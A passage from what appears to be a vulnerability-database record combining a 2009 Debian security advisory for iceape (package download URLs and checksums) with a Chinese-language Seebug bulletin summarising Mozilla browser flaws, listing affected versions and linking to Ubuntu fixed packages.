(Big Endian))\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_mips.deb\n Size/MD5 checksum: 193922 fa7ef5ff71177f2ddd6842c335ff6b0e\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_mips.deb\n Size/MD5 checksum: 11140164 9188919a54175217153ad1b7900397cd\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_mips.deb\n Size/MD5 checksum: 61581874 31636d074d991a80a0e7b7d314999fd2\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_mips.deb\n Size/MD5 checksum: 601582 bdee14d2f4f81f6afa2d9b58be1d0c94\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_mips.deb\n Size/MD5 checksum: 52124 2f6b4f92e32bc1f1afb7ee1563faad8f\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_mips.deb\n Size/MD5 checksum: 1958828 84d9804ceea7404e213e883a970810eb\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 10925674 27894883c1de817d54cc4907a382d980\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 598084 83e4d5bb9ac0d4d8e47ca121e99866ce\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 1944652 32c2318db8b4bcaa5845b532d72de713\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 193434 b3e49574473fe47d0017da5ebe20d7bc\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 59935110 dc8551b52c078a10192b9693a16ffe3b\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_mipsel.deb\n Size/MD5 checksum: 51936 96f5aca01dcedbd47c0576cbb72c8b6c\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 61714000 86246588c13b8ec2a2c678d2d22fb9c2\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 598244 a800be58f01cfb5e95e2fad048f1d698\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 2008442 ba78c3982162ae34e75fec4c5a942a85\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 51290 70f98cf9e61d4a05282be3b751064c86\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 194126 ed1919113692ba5fa791fa488a4f4439\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_powerpc.deb\n Size/MD5 checksum: 11325232 77ae05048976e57731e988f141ae5bec\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_s390.deb\n Size/MD5 checksum: 614074 89cf267528c6f7c35e39935d2ed4040c\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_s390.deb\n Size/MD5 checksum: 60468932 ef714afc155664d90f19528a9fc3ecc0\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_s390.deb\n Size/MD5 checksum: 2187836 38740bf0c2f5c87205ab9c990ea4177d\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_s390.deb\n Size/MD5 checksum: 56036 9b3deb1020cde420c9abf02fd66efd2f\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_s390.deb\n Size/MD5 checksum: 199010 115d1e007cf3f8731421eed4cfc6e90a\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_s390.deb\n Size/MD5 checksum: 12300536 2811d12c7dee00fadcd9eb5c58ec8f4f\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/i/iceape/iceape-browser_1.0.13~pre080614i-0etch1_sparc.deb\n Size/MD5 checksum: 10694130 88813d3246501a19f576e420968f688b\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dom-inspector_1.0.13~pre080614i-0etch1_sparc.deb\n Size/MD5 checksum: 190218 c47a2036511b7338e757b2e42e035e7c\n http://security.debian.org/pool/updates/main/i/iceape/iceape-gnome-support_1.0.13~pre080614i-0etch1_sparc.deb\n Size/MD5 checksum: 49148 cec70f901ce76c3710026a2635315af0\n http://security.debian.org/pool/updates/main/i/iceape/iceape-calendar_1.0.13~pre080614i-0etch1_sparc.deb\n Size/MD5 checksum: 590140 ff8c1213e52c2d2bb0bab134db93f840\n http://security.debian.org/pool/updates/main/i/iceape/iceape-mailnews_1.0.13~pre080614i-0etch1_sparc.deb\n Size/MD5 checksum: 1904008 6b2327e75595ba38f48139a7fc4776a0\n http://security.debian.org/pool/updates/main/i/iceape/iceape-dbg_1.0.13~pre080614i-0etch1_sparc.deb\n Size/MD5 checksum: 58609342 8c945ce7ad5f770c780ec63653c8c033\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2009-01-07T21:42:05", "title": "[SECURITY] [DSA 1697-1] New iceape packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:15", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-2933", "CVE-2008-2801", "CVE-2008-3835", "CVE-2008-2785", "CVE-2008-2799", "CVE-2008-5500", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-5012", "CVE-2008-5013", "CVE-2008-3836", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-2803", "CVE-2008-4059", "CVE-2008-0304", "CVE-2008-2807", "CVE-2008-3837", "CVE-2008-5021", "CVE-2008-5017", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-5014", "CVE-2008-4058", "CVE-2008-5022", "CVE-2008-5512", "CVE-2008-4068", "CVE-2008-5503", "CVE-2008-2810", "CVE-2008-5511", "CVE-2008-2805", "CVE-2008-5508", "CVE-2008-4061", "CVE-2008-2808", "CVE-2008-0017", "CVE-2008-5024", "CVE-2008-5507", "CVE-2008-4065", "CVE-2008-2800", "CVE-2008-4582", "CVE-2008-2802", "CVE-2008-2809", "CVE-2008-5506", "CVE-2008-2811", "CVE-2008-2798"], "modified": "2009-01-07T21:42:05", "id": "DEBIAN:DSA-1697-1:8C099", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00004.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:29:54", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 31346\r\nCVE ID: CVE-2008-3837\r\n CVE-2008-4058\r\n CVE-2008-4059\r\n CVE-2008-4060\r\n CVE-2008-4061\r\n CVE-2008-4062\r\n CVE-2008-4063\r\n CVE-2008-4064\r\n CVE-2008-4065\r\n CVE-2008-4066\r\n CVE-2008-4067\r\n CVE-2008-4068\r\n CVE-2008-4069\r\n CVE-2008-3836\r\n CVE-2008-3835\r\n CVE-2008-0016\r\nCNCVE ID\uff1aCNCVE-20083837\r\n CNCVE-20084058\r\n CNCVE-20084059\r\n CNCVE-20084060\r\n CNCVE-20084061\r\n CNCVE-20084062\r\n CNCVE-20084063\r\n CNCVE-20084064\r\n CNCVE-20084065\r\n CNCVE-20084066\r\n CNCVE-20084067\r\n CNCVE-20084068\r\n CNCVE-20084069\r\n CNCVE-20083836\r\n CNCVE-20083835\r\n CNCVE-20080016\r\n\r\nMozilla Firefox/SeaMonkey/Thunderbird\u662f\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u6d4f\u89c8\u5668\u548c\u90ae\u4ef6\u65b0\u95fb\u7ec4\u5ba2\u6237\u7aef\u4ea7\u54c1\u5957\u4ef6\u3002\r\nMozilla Firefox/SeaMonkey/Thunderbird\u5b58\u5728\u591a\u4e2a\u95ee\u9898\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u8fdb\u884c\u4efb\u610f\u4ee3\u7801\u6267\u884c\uff0c\u83b7\u5f97\u654f\u611f\u4fe1\u606f\uff0c\u62d2\u7edd\u670d\u52a1\uff0c\u8de8\u57df\u6267\u884c\u811a\u672c\u7b49\u653b\u51fb\u3002\r\n-IBM X-Force\u7684Justin Schuh\u548cTom Cross\u53caIBM Watson Labs\u7684Peter Williams\u62a5\u544aMozilla URL\u89e3\u6790\u51fd\u6570\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u8fd9\u4e9b\u9519\u8bef\u53ef\u901a\u8fc7\u8d85\u7ea7\u94fe\u63a5\u4e2d\u4f7f\u7528\u7279\u6b8a\u6784\u5efa\u7684UTF-8 URL\u6765\u89e6\u53d1\uff0c\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n-Mozilla security researcher moz_bug_r_a4\u62a5\u544ansXMLDocument::OnChannelRedirect()\u4e2d\u7684\u540c\u57df\u68c0\u67e5\u53ef\u88ab\u7ed5\u8fc7\uff0c\u5bfc\u81f4\u811a\u672c\u5728\u5176\u4ed6WEB\u7ad9\u70b9\u4e0a\u6267\u884c\u3002\r\n-Mozilla security researcher moz_bug_r_a4\u5305\u542bfeedWriter\u5b58\u5728\u4e00\u7cfb\u5217\u6f0f\u6d1e\uff0c\u5141\u8bb8\u9875\u9762\u5185\u5bb9\u4e2d\u7684\u811a\u672c\u4ee5chrome\u7279\u6743\u6267\u884c\u3002\r\n-Mozilla security researcher moz_bug_r_a4\u5305\u542b\u4e00\u4e9b\u6f0f\u6d1e\uff0c\u5982\u9875\u9762\u5185\u5bb9\u53ef\u7834\u574fXPCNativeWrappers\uff0c\u53ca\u4ee5chrome\u7279\u6743\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u5176\u4e2d\u4e00\u4e2a\u53d8\u79cd\u95ee\u9898\u53ea\u5f71\u54cdFirefox 2\u3002\r\n-Mozilla developer Olli Pettay\u62a5\u544aXSLT\u53ef\u5efa\u7acb\u4e0d\u5305\u542b\u811a\u672c\u5904\u7406\u5bf9\u8c61\u7684\u6587\u6863\u3002moz_bug_r_a4\u62a5\u544adocument.loadBindingDocument()\u53ef\u8fd4\u56de\u4e0d\u5305\u542b\u811a\u672c\u5904\u7406\u5bf9\u8c61\u7684\u6587\u6863\u3002\u8fd9\u4e9b\u95ee\u9898\u4e5f\u53ef\u7528\u4e8e\u4ee5chrome\u7279\u6743\u6267\u884c\u4efb\u610f\u811a\u672c\u3002\r\n-Mozilla developers\u5305\u542bFirefox\u548c\u5176\u4ed6Mozilla\u4ea7\u54c1\u7684\u6d4f\u89c8\u5668\u5f15\u64ce\u5b58\u5728\u95ee\u9898\uff0c\u5728\u90e8\u5206\u6761\u4ef6\u4e0b\u53ef\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u6216\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\npple Product Security\u7684Drew Yao\u62a5\u544aMozilla\u56fe\u50cf\u6e32\u67d3\u4ee3\u7801\u5b58\u5728\u4e24\u4e2a\u5d29\u6e83\u95ee\u9898\uff0c\u6b64\u6f0f\u6d1e\u53ea\u5f71\u54cdFirefox 3\u3002\r\nFortinet's FortiGuard Global Security Research Team\u7684David Maciejak\u4e5f\u62a5\u544a\u5f71\u54cdFirefox 3\u7684\u56fe\u50cf\u6e32\u67d3\u4ee3\u7801\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u3002\r\n-Microsoft developer Dave Reed\u62a5\u544a\u90e8\u5206BOM\u5b57\u7b26\u4eceJavascript\u4ee3\u7801\u5265\u79bb\u524d\u53ef\u6267\u884c\uff0c\u8fd9\u53ef\u5bfc\u81f4\u653b\u51fb\u8005\u7ed5\u8fc7\u811a\u672c\u8fc7\u6ee4\u5668\u6267\u884cXSS\u653b\u51fb\u3002\r\nSecurity researcher Gareth Heyes\u62a5\u544aHTML\u89e3\u6790\u5668\u5b58\u5728\u95ee\u9898\uff0c\u53ef\u5bfc\u81f4\u7ed5\u8fc7\u811a\u672c\u8fc7\u6ee4\u5668\u6267\u884cXSS\u653b\u51fb\u3002\r\n-Mozilla developer Boris Zbarsky\u62a5\u544a\u5f53\u4f7f\u7528URL\u7f16\u7801\u659c\u6760\u65f6\uff0cresource:\u534f\u8bae\u5141\u8bb8\u5728Linux\u5e73\u53f0\u4e0a\u89e6\u53d1\u76ee\u5f55\u904d\u5386\u653b\u51fb\u3002\r\nMozilla developer Georgi Guninski\u62a5\u544a\u5728\u672c\u5730HTML\u6587\u4ef6\u4e0a\u7684\u9650\u5236\u53ef\u4f7f\u7528resource:\u534f\u8bae\u7ed5\u8fc7\uff0c\u6b64\u6f0f\u6d1e\u53ef\u5bfc\u81f4\u653b\u51fb\u8005\u8bfb\u53d6\u7cfb\u7edf\u4e0a\u7684\u4fe1\u606f\u3002\r\n-Security researcher Billy Hoffman\u5728XBM\u89e3\u7801\u4e0a\u53d1\u73b0\u4e00\u4e2a\u7f3a\u9677\uff0c\u5141\u8bb8\u968f\u673a\u5c0f\u7684\u672a\u521d\u59cb\u5316\u5757\u5185\u5b58\u88ab\u8bfb\u53d6\uff0c\u6b64\u6f0f\u6d1e\u6ca1\u6709\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u3002\r\n\n\nUbuntu Ubuntu Linux 8.04 LTS sparc\r\nUbuntu Ubuntu Linux 8.04 LTS powerpc\r\nUbuntu Ubuntu Linux 8.04 LTS lpia\r\nUbuntu Ubuntu Linux 8.04 LTS i386\r\nUbuntu Ubuntu Linux 8.04 LTS amd64\r\nUbuntu Ubuntu Linux 7.10 sparc\r\nUbuntu Ubuntu Linux 7.10 powerpc\r\nUbuntu Ubuntu Linux 7.10 lpia\r\nUbuntu Ubuntu Linux 7.10 i386\r\nUbuntu Ubuntu Linux 7.10 amd64\r\nUbuntu Ubuntu Linux 7.04 sparc\r\nUbuntu Ubuntu Linux 7.04 powerpc\r\nUbuntu Ubuntu Linux 7.04 i386\r\nUbuntu Ubuntu Linux 7.04 amd64\r\nUbuntu Ubuntu Linux 6.06 LTS sparc\r\nUbuntu Ubuntu Linux 6.06 LTS powerpc\r\nUbuntu Ubuntu Linux 6.06 LTS i386\r\nUbuntu Ubuntu Linux 6.06 LTS amd64\r\nRedHat Enterprise Linux WS 4\r\nRedHat Enterprise Linux WS 3\r\nRedHat Enterprise Linux WS 2.1\r\nRedHat Enterprise Linux ES 4\r\nRedHat Enterprise Linux ES 3\r\nRedHat Enterprise Linux ES 2.1\r\nRedHat Enterprise Linux Desktop Workstation 5 client\r\nRedHat Enterprise Linux Desktop 5 client\r\nRedHat Enterprise Linux AS 4\r\nRedHat Enterprise Linux AS 3\r\nRedHat Enterprise Linux AS 2.1\r\nRedHat Enterprise Linux 5 server\r\nRedHat Desktop 4.0 \r\nRedHat Desktop 3.0 \r\nRedHat Advanced Workstation for the Itanium Processor 2.1 \r\nMozilla Thunderbird 2.0 8\r\nMozilla Thunderbird 2.0 16\r\nMozilla Thunderbird 2.0 15\r\nMozilla Thunderbird 2.0 .9\r\nMozilla Thunderbird 2.0 .6\r\nMozilla Thunderbird 2.0 .5\r\nMozilla Thunderbird 2.0 .4\r\nMozilla Thunderbird 2.0 .14\r\nMozilla Thunderbird 2.0 .13\r\nMozilla Thunderbird 2.0 .12\r\nMozilla SeaMonkey 1.1.11 \r\nMozilla SeaMonkey 1.1.10 \r\nMozilla SeaMonkey 1.1.9 \r\nMozilla SeaMonkey 1.1.8 \r\nMozilla SeaMonkey 1.1.7 \r\nMozilla SeaMonkey 1.1.6 \r\nMozilla SeaMonkey 1.1.5 \r\nMozilla SeaMonkey 1.1.4 \r\nMozilla SeaMonkey 1.1.3 \r\nMozilla SeaMonkey 1.1.2 \r\nMozilla SeaMonkey 1.1.1 \r\nMozilla SeaMonkey 1.0.99 \r\nMozilla SeaMonkey 1.0.9 \r\nMozilla SeaMonkey 1.0.8 \r\nMozilla SeaMonkey 1.0.7 \r\nMozilla SeaMonkey 1.0.6 \r\nMozilla SeaMonkey 1.0.5 \r\nMozilla SeaMonkey 1.0.3 \r\nMozilla SeaMonkey 1.0.2 \r\nMozilla SeaMonkey 1.0.1 \r\nMozilla SeaMonkey 1.1 beta\r\nMozilla SeaMonkey 1.0 dev\r\nMozilla SeaMonkey 1.0\r\nMozilla Firefox 3.0.1 \r\nMozilla Firefox 2.0 8\r\nMozilla Firefox 2.0 16\r\nMozilla Firefox 2.0 .9\r\nMozilla Firefox 2.0 .7\r\nMozilla Firefox 2.0 .6\r\nMozilla Firefox 2.0 .5\r\nMozilla Firefox 2.0 .4\r\nMozilla Firefox 2.0 .3\r\nMozilla Firefox 2.0 .10\r\nMozilla Firefox 2.0 .1\r\nMozilla Firefox 3.0 Beta 5\r\nMozilla Firefox 3.0\r\nMozilla Firefox 2.0.0.3\r\nMozilla Firefox 2.0.0.2\r\nMozilla Firefox 2.0.0.15\r\nMozilla Firefox 2.0.0.14\r\nMozilla Firefox 2.0.0.13\r\nMozilla Firefox 2.0.0.12\r\nMozilla Firefox 2.0.0.11\r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2.0.0.10\r\nMozilla Firefox 2.0 RC3\r\nMozilla Firefox 2.0 RC2\r\nMozilla Firefox 2.0 beta 1\r\nMozilla Firefox 2.0\n \u53ef\u53c2\u8003\u5982\u4e0b\u5347\u7ea7\u7a0b\u5e8f\uff1a\r\nMozilla Firefox 3.0\r\nMozilla Firefox 3 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all.html target=_blank>http://www.mozilla.com/en-US/firefox/all.html</a>\r\nUbuntu Ubuntu Linux 7.10 powerpc\r\nUbuntu firefox-dbg_2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\nUbuntu firefox-dev_2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\nUbuntu firefox-libthai_2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_</a> 2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\nUbuntu firefox_2.0.0.17+1nobinonly-0ubuntu0.7.10_powerpc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17 target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17</a> +1nobinonly-0ubuntu0.7.10_powerpc.deb\r\n \r\nMozilla Firefox 2.0.0.14\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nUbuntu Ubuntu Linux 6.06 LTS sparc\r\nUbuntu firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.</a> dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg</a> +1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.fi</a> refox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firef</a> ox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.fir</a> efox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefo</a> x1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_sparc.deb\r\nUbuntu mozilla-firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-fire</a> fox-dev_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\nUbuntu mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_</a> 1.5.dfsg+1.5.0.15~prepatch080614e-0ubuntu3_all.deb\r\n \r\nMozilla Firefox 2.0.0.13\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 2.0 RC2\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\nUbuntu Ubuntu Linux 7.10 sparc\r\nUbuntu firefox-dbg_2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\nUbuntu firefox-dev_2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.</a> 0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- target=_blank>http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-</a> inspector_2.0.0.17+1nobinonly-0ubuntu0.7.10_all.deb\r\nUbuntu firefox-gnome-support_2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-su</a> pport_2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\nUbuntu firefox-libthai_2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_ target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_</a> 2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\nUbuntu firefox_2.0.0.17+1nobinonly-0ubuntu0.7.10_sparc.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17 target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.17</a> +1nobinonly-0ubuntu0.7.10_sparc.deb\r\n \r\nMozilla Firefox 2.0 beta 1\r\nMozilla Firefox 2 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all-older.html target=_blank>http://www.mozilla.com/en-US/firefox/all-older.html</a>\r\n \r\nMozilla Firefox 3.0 Beta 5\r\nMozilla Firefox 3 Download\r\n<a href=http://www.mozilla.com/en-US/firefox/all.html target=_blank>http://www.mozilla.com/en-US/firefox/all.html</a>\r\nUbuntu Ubuntu Linux 7.04 i386\r\nUbuntu firefox-dbg_2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.</a> 0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu firefox-dev_2.0.0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0. target=_blank>http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.</a> 0.17+0nobinonly-0ubuntu0.7.4_i386.deb\r\nUbuntu firefox-dom-inspector_2.0.0.17+0nobinonly-0ubuntu0.7.4_all.deb\r\n<a href=http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom- 